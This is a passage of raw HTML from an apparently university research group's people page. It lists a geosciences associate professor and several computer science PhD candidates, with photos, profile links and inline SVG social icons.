<!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-973 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1636 style-973-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-974 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-975 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-976 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-977 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c61\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c61 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c128\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c128 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c129-outer\">\n            <div data-colibri-id=\"182-c129\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c129 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-862 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c62\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c62 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c63-outer\">\n            <div data-colibri-id=\"182-c63\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c63 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c64\" class=\"d-block style-854 style-local-182-c64 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c64-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c64-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c65\" class=\"h-global-transition-all h-heading style-850 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c65\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-text h-text-component style-851 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-902 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"style-855 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-849 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-901 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-853 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-856 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-852 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-857 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 